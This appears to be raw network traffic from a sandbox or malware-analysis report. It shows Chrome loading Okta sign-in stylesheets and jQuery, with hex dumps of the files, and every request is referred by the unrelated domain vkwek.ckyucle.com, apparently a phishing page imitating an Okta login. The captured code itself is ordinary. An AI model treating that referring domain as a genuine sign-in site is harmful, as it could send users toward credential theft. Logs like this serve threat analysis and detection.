                                                              48192.168.2.66292913.33.187.684434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:05 UTC600OUTGET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1
                                                              Host: ok4static.oktacdn.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: text/css,*/*;q=0.1
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: style
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:05 UTC768INHTTP/1.1 200 OK
                                                              Content-Type: text/css
                                                              Content-Length: 222931
                                                              Connection: close
                                                              Date: Tue, 02 Jul 2024 08:46:59 GMT
                                                              Server: nginx
                                                              Last-Modified: Tue, 14 May 2024 21:48:24 GMT
                                                              ETag: "0329c939fca7c78756b94fbcd95e322b"
                                                              x-amz-meta-sha1sum: 7b5499b46660a0348cc2b22cae927dcc3fda8b20
                                                              Expires: Wed, 02 Jul 2025 08:46:59 GMT
                                                              Cache-Control: max-age=31536000
                                                              Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                              Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                              Access-Control-Allow-Origin: *
                                                              Accept-Ranges: bytes
                                                              Vary: Accept-Encoding
                                                              X-Cache: Hit from cloudfront
                                                              Via: 1.1 ccd3e547bd5d86bbfbaca15b4307ce70.cloudfront.net (CloudFront)
                                                              X-Amz-Cf-Pop: FRA60-P9
                                                              X-Amz-Cf-Id: OMDgTjzlmqmL00MhsPXNNb0csob3h5Y7dvY1muH8GUq9p1OeLbrikQ==
                                                              Age: 82446
                                                              2024-07-03 07:41:05 UTC16384INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 71 74 69 70 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 2e 35 70 78 3b 6c 65 66 74 3a 2d 32 38 30 30 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 32 38 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 35 30 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 32 38 30 30 30 70 78 7d 2e 71 74 69 70 2d 63 6f 6e 74 65 6e 74 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 70 61 64 64 69 6e 67 3a 35 70 78 20 39 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 71
                                                              Data Ascii: @charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.q
                                                              2024-07-03 07:41:06 UTC16384INData Raw: 66 6f 72 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 64 69 73 6d 69 73 73 2d 69 63 6f 6e 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 2a 3d 22 2d 33 32 22 5d 3a 61 66 74 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 2a 3d 22 2d 33 32 22 5d 3a 62 65 66 6f 72 65 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 5e 3d 22 2d 33 32 22 5d 3a 61 66 74 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 5e 3d 22 2d 33 32 22 5d 3a 62 65 66 6f 72 65 7b 73 70 65 61 6b 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 2d
                                                              Data Ascii: fore{font-size:32px;position:absolute}#okta-sign-in .dismiss-icon,#okta-sign-in [class*="-32"]:after,#okta-sign-in [class*="-32"]:before,#okta-sign-in [class^="-32"]:after,#okta-sign-in [class^="-32"]:before{speak:none;-webkit-font-smoothing:antialiased;-
                                                              2024-07-03 07:41:06 UTC16384INData Raw: 6e 74 3a 22 5c 65 30 31 64 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 72 65 6d 6f 76 65 2d 31 36 3a 61 66 74 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 37 63 63 30 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 61 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 6d 65 6d 62 65 72 2d 61 64 64 2d 31 36 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 35 65 35 65 35 65 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 64 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 6d 65 6d 62 65 72 2d 61 64 64 2d 31 36 3a 61 66 74 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 37 63 63 30 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 31 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 6d 65 6d 62 65 72 2d 72 65 6d 6f 76 65
                                                              Data Ascii: nt:"\e01d"}#okta-sign-in .group-remove-16:after{color:#007cc0;content:"\e00a"}#okta-sign-in .group-member-add-16:before{color:#5e5e5e;content:"\e00d"}#okta-sign-in .group-member-add-16:after{color:#007cc0;content:"\e001"}#okta-sign-in .group-member-remove
                                                              2024-07-03 07:41:06 UTC16384INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 39 66 39 66 39 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 64 72 6f 70 64 6f 77 6e 2e 6d 6f 72 65 2d 61 63 74 69 6f 6e 73 20 2e 6f 70 74 69 6f 6e 2d 73 65 6c 65 63 74 65 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 3b 66 6c 6f 61 74 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 20 32 32 70 78 20 30 20 38 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 2e 64 72 6f 70 64 6f 77 6e 2e 6d 6f 72 65 2d 61 63 74 69 6f 6e 73 20 2e 6f 70 74 69 6f 6e 2d 73 65 6c 65 63 74 65 64 7b
                                                              Data Ascii: background:#f9f9f9}#okta-sign-in .dropdown.more-actions .option-selected{color:#333;float:none!important;overflow:hidden;padding:0 22px 0 8px!important;position:relative;white-space:nowrap}#okta-sign-in .page-links .dropdown.more-actions .option-selected{
                                                              2024-07-03 07:41:06 UTC16384INData Raw: 6e 74 61 69 6e 65 72 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 69 6e 67 6c 65 2d 6e 6f 73 65 61 72 63 68 2e 63 6c 6f 73 65 64 20 2e 63 68 7a 6e 2d 64 72 6f 70 20 2e 63 68 7a 6e 2d 73 65 61 72 63 68 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 69 6e 67 6c 65 2e 63 6c 6f 73 65 64 20 2e 63 68 7a 6e 2d 64 72 6f 70 20 2e 63 68 7a 6e 2d 73 65 61 72 63 68 7b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 69 6e 67 6c 65 2d 6e 6f 73 65 61 72 63 68 2e 63 6c 6f 73 65 64 20 2e 63 68 7a 6e 2d 64 72 6f
                                                              Data Ascii: ntainer.chzn-container-single-nosearch.closed .chzn-drop .chzn-search,#okta-sign-in .chzn-container.chzn-container-single.closed .chzn-drop .chzn-search{left:0;position:relative}#okta-sign-in .chzn-container.chzn-container-single-nosearch.closed .chzn-dro
                                                              2024-07-03 07:41:06 UTC16384INData Raw: 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 31 36 70 78 20 2d 32 31 33 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 75 73 74 6f 6d 2d 63 68 65 63 6b 62 6f 78 20 6c 61 62 65 6c 2e 63 68 65 63 6b 65 64 2e 66 6f 63 75 73 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 75 73 74 6f 6d 2d 63 68 65 63 6b 62 6f 78 20 6c 61 62 65 6c 2e 63 68 65 63 6b 65 64 2e 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 31 36 70 78 20 2d 33 31 33 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 2d 6c 61 62 65 6c 2d 74 6f 70 20 2e 6f 2d 66 6f 72 6d 2d 69 6e 70 75 74 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 2d 6c 61 62 65 6c 2d 74 6f 70 20 2e 6f 2d 66 6f 72 6d 2d
                                                              Data Ascii: {background-position:-16px -213px}#okta-sign-in .custom-checkbox label.checked.focus,#okta-sign-in .custom-checkbox label.checked.hover{background-position:-16px -313px}#okta-sign-in .o-form-label-top .o-form-input,#okta-sign-in .o-form-label-top .o-form-
                                                              2024-07-03 07:41:06 UTC16384INData Raw: 20 2e 74 65 78 74 61 72 65 61 2d 66 69 78 20 69 6e 70 75 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 64 65 76 69 63 65 2d 77 69 64 74 68 3a 34 31 34 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 64 65 76 69 63 65 2d 77 69 64 74 68 3a 37 33 36 70 78 29 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 33 29 7b 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 20 2e 69 6e 70 75 74 2d 66 69 78 20 69 6e 70 75 74 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 20 2e 74 65 78 74 61 72 65 61 2d 66 69 78 20 69 6e 70 75 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 7d 40 6d 65 64 69
                                                              Data Ascii: .textarea-fix input{font-size:15px}}@media only screen and (min-device-width:414px) and (max-device-width:736px) and (-webkit-min-device-pixel-ratio:3){#okta-sign-in .o-form .input-fix input,#okta-sign-in .o-form .textarea-fix input{font-size:15px}}@medi
                                                              2024-07-03 07:41:06 UTC15130INData Raw: 67 2f 69 63 6f 6e 73 2f 6c 6f 67 69 6e 2f 66 61 63 65 62 6f 6f 6b 5f 6c 6f 67 6f 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 31 32 70 78 2f 32 34 70 78 2c 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 39 30 64 65 67 2c 23 66 66 66 20 35 30 70 78 2c 23 66 66 66 20 30 29 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 73 6f 63 69 61 6c 2d 61 75 74 68 2d 66 61 63 65 62 6f 6f 6b 2d 62 75 74 74 6f 6e 2e 6c 69 6e 6b 2d 62 75 74 74 6f 6e 7b 63 6f 6c 6f 72 3a 23 31 64 31 64 32 31 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 73 6f 63 69 61 6c 2d 61 75 74 68 2d 67 6f 6f 67 6c 65 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 62 66 62 66 62 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2e 2e 2f 69 6d 67 2f 69 63 6f 6e 73
                                                              Data Ascii: g/icons/login/facebook_logo.png) no-repeat 12px/24px,linear-gradient(90deg,#fff 50px,#fff 0)}#okta-sign-in .social-auth-facebook-button.link-button{color:#1d1d21}#okta-sign-in .social-auth-google-button{background-color:#fbfbfb;background:url(../img/icons
                                                              2024-07-03 07:41:06 UTC16384INData Raw: 2e 63 6f 6e 73 65 6e 74 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 70 7b 63 6f 6c 6f 72 3a 23 36 65 36 65 37 38 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 6f 6e 73 65 6e 74 2d 72 65 71 75 69 72 65 64 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 61 6e 75 6c 61 72 2d 63 6f 6e 73 65 6e 74 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 6f 6e 73 65 6e 74 2d 72 65 71 75 69 72 65 64 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 20 61 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 61 6e 75 6c 61 72 2d 63 6f 6e 73 65 6e 74 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 20 61 7b 63 6f 6c 6f
                                                              Data Ascii: .consent-description p{color:#6e6e78}#okta-sign-in .consent-required .consent-footer,#okta-sign-in .granular-consent .consent-footer{text-align:center}#okta-sign-in .consent-required .consent-footer a,#okta-sign-in .granular-consent .consent-footer a{colo
                                                              2024-07-03 07:41:06 UTC16384INData Raw: 6e 20 2e 65 6e 72 6f 6c 6c 2d 75 32 66 2d 66 6f 72 6d 20 2e 6f 2d 66 6f 72 6d 2d 66 69 65 6c 64 73 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 70 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 65 6e 72 6f 6c 6c 2d 77 65 62 61 75 74 68 6e 2d 66 6f 72 6d 20 2e 6f 2d 66 6f 72 6d 2d 66 69 65 6c 64 73 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 70 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 76 65 72 69 66 79 2d 75 32 66 2d 66 6f 72 6d 20 2e 6f 2d 66 6f 72 6d 2d 66 69 65 6c 64 73 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 70 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 76 65 72 69 66 79 2d 77 65 62 61 75 74 68 6e 2d 66 6f 72 6d 20 2e 6f 2d 66 6f 72 6d 2d 66 69 65 6c 64 73 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 70 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 35 70
                                                              Data Ascii: n .enroll-u2f-form .o-form-fieldset-container p,#okta-sign-in .enroll-webauthn-form .o-form-fieldset-container p,#okta-sign-in .verify-u2f-form .o-form-fieldset-container p,#okta-sign-in .verify-webauthn-form .o-form-fieldset-container p{margin-bottom:15p


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              49192.168.2.66292813.33.187.684434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:05 UTC609OUTGET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1
                                                              Host: ok4static.oktacdn.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: text/css,*/*;q=0.1
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: style
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:05 UTC768INHTTP/1.1 200 OK
                                                              Content-Type: text/css
                                                              Content-Length: 10498
                                                              Connection: close
                                                              Date: Mon, 01 Jul 2024 20:09:31 GMT
                                                              Server: nginx
                                                              Last-Modified: Thu, 14 Mar 2024 00:03:58 GMT
                                                              ETag: "e0d37a504604ef874bad26435d62011f"
                                                              x-amz-meta-sha1sum: 4301f0d2b729ae22adece657d79eccaa25f429b1
                                                              Expires: Tue, 01 Jul 2025 20:09:31 GMT
                                                              Cache-Control: max-age=31536000
                                                              Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                              Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                              Access-Control-Allow-Origin: *
                                                              Accept-Ranges: bytes
                                                              Vary: Accept-Encoding
                                                              X-Cache: Hit from cloudfront
                                                              Via: 1.1 2e8126aebd83e92e3cf50c4f9c832912.cloudfront.net (CloudFront)
                                                              X-Amz-Cf-Pop: FRA60-P9
                                                              X-Amz-Cf-Id: 8dArSw-sSiD3qwVhz8kVtA8KJqBv-WLJruvjC9-lPkiEWIOYVMohPQ==
                                                              Age: 127894
                                                              2024-07-03 07:41:05 UTC10498INData Raw: 61 2c 61 62 62 72 2c 61 63 72 6f 6e 79 6d 2c 61 64 64 72 65 73 73 2c 61 70 70 6c 65 74 2c 62 2c 62 69 67 2c 62 6c 6f 63 6b 71 75 6f 74 65 2c 62 6f 64 79 2c 63 61 70 74 69 6f 6e 2c 63 65 6e 74 65 72 2c 63 69 74 65 2c 63 6f 64 65 2c 64 64 2c 64 65 6c 2c 64 66 6e 2c 64 69 76 2c 64 6c 2c 64 74 2c 65 6d 2c 66 69 65 6c 64 73 65 74 2c 66 6f 72 6d 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 74 6d 6c 2c 69 2c 69 66 72 61 6d 65 2c 69 6d 67 2c 69 6e 73 2c 6b 62 64 2c 6c 61 62 65 6c 2c 6c 65 67 65 6e 64 2c 6c 69 2c 6f 62 6a 65 63 74 2c 6f 6c 2c 70 2c 70 72 65 2c 71 2c 73 2c 73 61 6d 70 2c 73 6d 61 6c 6c 2c 73 70 61 6e 2c 73 74 72 69 6b 65 2c 73 74 72 6f 6e 67 2c 73 75 62 2c 73 75 70 2c 74 61 62 6c 65 2c 74 62 6f 64 79 2c 74 64 2c 74 66 6f 6f 74 2c 74
                                                              Data Ascii: a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,t


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              50192.168.2.662930151.101.66.1374434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:06 UTC677OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                              Host: code.jquery.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: script
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Range: bytes=64710-89500
                                                              If-Range: "28feccc0-15d9d"
                                                              2024-07-03 07:41:06 UTC613INHTTP/1.1 206 Partial Content
                                                              Connection: close
                                                              Content-Length: 24791
                                                              Server: nginx
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                              ETag: "28feccc0-15d9d"
                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                              Access-Control-Allow-Origin: *
                                                              Via: 1.1 varnish, 1.1 varnish
                                                              Accept-Ranges: bytes
                                                              Age: 1397037
                                                              Content-Range: bytes 64710-89500/89501
                                                              Date: Wed, 03 Jul 2024 07:41:06 GMT
                                                              X-Served-By: cache-lga21931-LGA, cache-ewr18168-EWR
                                                              X-Cache: HIT, HIT
                                                              X-Cache-Hits: 55, 0
                                                              X-Timer: S1719992466.101098,VS0,VE1
                                                              Vary: Accept-Encoding
                                                              2024-07-03 07:41:06 UTC1378INData Raw: 6e 2e 73 70 6c 69 63 65 28 74 2d 2d 2c 31 29 3b 6e 2e 6c 65 6e 67 74 68 7c 7c 53 2e 66 78 2e 73 74 6f 70 28 29 2c 5a 65 3d 76 6f 69 64 20 30 7d 2c 53 2e 66 78 2e 74 69 6d 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 53 2e 74 69 6d 65 72 73 2e 70 75 73 68 28 65 29 2c 53 2e 66 78 2e 73 74 61 72 74 28 29 7d 2c 53 2e 66 78 2e 69 6e 74 65 72 76 61 6c 3d 31 33 2c 53 2e 66 78 2e 73 74 61 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 65 74 7c 7c 28 65 74 3d 21 30 2c 6f 74 28 29 29 7d 2c 53 2e 66 78 2e 73 74 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 65 74 3d 6e 75 6c 6c 7d 2c 53 2e 66 78 2e 73 70 65 65 64 73 3d 7b 73 6c 6f 77 3a 36 30 30 2c 66 61 73 74 3a 32 30 30 2c 5f 64 65 66 61 75 6c 74 3a 34 30 30 7d 2c 53 2e 66 6e 2e 64 65 6c 61 79 3d 66 75 6e 63 74 69 6f 6e 28
                                                              Data Ascii: n.splice(t--,1);n.length||S.fx.stop(),Ze=void 0},S.fx.timer=function(e){S.timers.push(e),S.fx.start()},S.fx.interval=13,S.fx.start=function(){et||(et=!0,ot())},S.fx.stop=function(){et=null},S.fx.speeds={slow:600,fast:200,_default:400},S.fn.delay=function(
                                                              2024-07-03 07:41:06 UTC1378INData Raw: 29 2c 74 7d 7d 7d 7d 2c 72 65 6d 6f 76 65 41 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 30 2c 69 3d 74 26 26 74 2e 6d 61 74 63 68 28 50 29 3b 69 66 28 69 26 26 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 77 68 69 6c 65 28 6e 3d 69 5b 72 2b 2b 5d 29 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 6e 29 7d 7d 29 2c 63 74 3d 7b 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 21 31 3d 3d 3d 74 3f 53 2e 72 65 6d 6f 76 65 41 74 74 72 28 65 2c 6e 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6e 2c 6e 29 2c 6e 7d 7d 2c 53 2e 65 61 63 68 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 73 6f 75 72 63 65 2e 6d 61 74 63 68 28 2f 5c 77 2b 2f 67 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c
                                                              Data Ascii: ),t}}}},removeAttr:function(e,t){var n,r=0,i=t&&t.match(P);if(i&&1===e.nodeType)while(n=i[r++])e.removeAttribute(n)}}),ct={set:function(e,t,n){return!1===t?S.removeAttr(e,n):e.setAttribute(n,n),n}},S.each(S.expr.match.bool.source.match(/\w+/g),function(e,
                                                              2024-07-03 07:41:06 UTC1378INData Raw: 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 74 26 26 28 74 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 7d 7d 29 2c 53 2e 65 61 63 68 28 5b 22 74 61 62 49 6e 64 65 78 22 2c 22 72 65 61 64 4f 6e 6c 79 22 2c 22 6d 61 78 4c 65 6e 67 74 68 22 2c 22 63 65 6c 6c 53 70 61 63 69 6e 67 22 2c 22 63 65 6c 6c 50 61 64 64 69 6e 67 22 2c 22 72 6f 77 53 70 61 6e 22 2c 22 63 6f 6c 53 70 61 6e 22 2c 22 75 73 65 4d 61 70 22 2c 22 66 72 61 6d 65 42 6f 72 64 65 72 22 2c 22 63 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 53 2e 70 72
                                                              Data Ascii: x,null},set:function(e){var t=e.parentNode;t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex)}}),S.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){S.pr
                                                              2024-07-03 07:41:06 UTC1378INData Raw: 7c 7c 28 28 65 3d 67 74 28 74 68 69 73 29 29 26 26 59 2e 73 65 74 28 74 68 69 73 2c 22 5f 5f 63 6c 61 73 73 4e 61 6d 65 5f 5f 22 2c 65 29 2c 74 68 69 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 26 26 74 68 69 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 63 6c 61 73 73 22 2c 65 7c 7c 21 31 3d 3d 3d 69 3f 22 22 3a 59 2e 67 65 74 28 74 68 69 73 2c 22 5f 5f 63 6c 61 73 73 4e 61 6d 65 5f 5f 22 29 7c 7c 22 22 29 29 7d 29 7d 2c 68 61 73 43 6c 61 73 73 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 2c 72 3d 30 3b 74 3d 22 20 22 2b 65 2b 22 20 22 3b 77 68 69 6c 65 28 6e 3d 74 68 69 73 5b 72 2b 2b 5d 29 69 66 28 31 3d 3d 3d 6e 2e 6e 6f 64 65 54 79 70 65 26 26 2d 31 3c 28 22 20 22 2b 68 74 28 67 74 28 6e 29 29 2b 22 20 22 29 2e 69 6e 64 65 78 4f 66 28
                                                              Data Ascii: ||((e=gt(this))&&Y.set(this,"__className__",e),this.setAttribute&&this.setAttribute("class",e||!1===i?"":Y.get(this,"__className__")||""))})},hasClass:function(e){var t,n,r=0;t=" "+e+" ";while(n=this[r++])if(1===n.nodeType&&-1<(" "+ht(gt(n))+" ").indexOf(
